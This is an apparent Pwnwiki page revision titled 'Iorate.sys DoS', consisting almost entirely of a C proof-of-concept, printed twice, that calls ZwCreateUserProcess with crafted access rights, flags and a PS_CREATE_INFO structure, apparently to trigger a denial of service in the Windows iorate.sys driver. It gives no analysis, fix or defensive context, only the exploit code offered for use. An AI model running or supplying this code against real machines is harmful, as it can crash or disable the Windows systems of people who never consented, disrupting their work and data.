Pwnwiki: Created page with "==POC==

 struct _PS_CREATE_INFO {     ulonglong Size;     ulonglong State;//at 0x8     ulong InitFlags;//at 0x10     ulong AdditionalFileAccess;//at 0x14     ulonglong X0..."

2021-05-31T07:58:42Z

Created page with "==POC== <pre> struct _PS_CREATE_INFO { ulonglong Size; ulonglong State;//at 0x8 ulong InitFlags;//at 0x10 ulong AdditionalFileAccess;//at 0x14 ulonglong X0..."

New page

==POC==
<pre>
struct _PS_CREATE_INFO
{
ulonglong Size;
ulonglong State;//at 0x8
ulong InitFlags;//at 0x10
ulong AdditionalFileAccess;//at 0x14
ulonglong X0;
ulonglong X1;
ulonglong X2;
ulonglong X3;
ulonglong X4;
ulonglong X5;
ulonglong X6;
ulonglong X7;
};

void IoRateDoS()
{
//--------- Parameters Start Here ----------
HANDLE hNewProcess = 0;
HANDLE hNewThread = 0;
ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
_OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
_OBJECT_ATTRIBUTES ObjAttr_t = {sizeof(ObjAttr_t)};
ulonglong ProcessFlagsX = 0x1000;
ulonglong ThreadFlagsX = 0;
ulonglong ProcessParametersX = 0;
_PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
PsCreateInfo.InitFlags = PsCreateInitialState;
PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
ulonglong AttributeListX = 0;
//---------------
ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
ProcessDesiredAccessX, ThreadDesiredAccessX,
&ObjAttr_p, &ObjAttr_t,
ProcessFlagsX, ThreadFlagsX,
(void*)ProcessParametersX,
&PsCreateInfo,
(void*)AttributeListX);
printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}
</pre>

==RAW Paste Data ==
<pre>
struct _PS_CREATE_INFO
{
ulonglong Size;
ulonglong State;//at 0x8
ulong InitFlags;//at 0x10
ulong AdditionalFileAccess;//at 0x14
ulonglong X0;
ulonglong X1;
ulonglong X2;
ulonglong X3;
ulonglong X4;
ulonglong X5;
ulonglong X6;
ulonglong X7;
};

void IoRateDoS()
{
//--------- Parameters Start Here ----------
HANDLE hNewProcess = 0;
HANDLE hNewThread = 0;
ulonglong ProcessDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
ulonglong ThreadDesiredAccessX = GENERIC_ALL;//MAXIMUM_ALLOWED;
_OBJECT_ATTRIBUTES ObjAttr_p = {sizeof(ObjAttr_p)};
_OBJECT_ATTRIBUTES ObjAttr_t = {sizeof(ObjAttr_t)};
ulonglong ProcessFlagsX = 0x1000;
ulonglong ThreadFlagsX = 0;
ulonglong ProcessParametersX = 0;
_PS_CREATE_INFO PsCreateInfo = {sizeof(PsCreateInfo)};
PsCreateInfo.InitFlags = PsCreateInitialState;
PsCreateInfo.AdditionalFileAccess = FILE_EXECUTE;
ulonglong AttributeListX = 0;
//---------------
ulonglong ret = ZwCreateUserProcess(&hNewProcess,&hNewThread,
ProcessDesiredAccessX, ThreadDesiredAccessX,
&ObjAttr_p, &ObjAttr_t,
ProcessFlagsX, ThreadFlagsX,
(void*)ProcessParametersX,
&PsCreateInfo,
(void*)AttributeListX);
printf("ZwCreateUserProcess, ret: %I64X\r\n",ret);
}
</pre>

Iorate.sys DoS - Revision history

Pwnwiki: Created page with "==POC==
struct _PS_CREATE_INFO { ulonglong Size; ulonglong State;//at 0x8 ulong InitFlags;//at 0x10 ulong AdditionalFileAccess;//at 0x14 ulonglong X0..."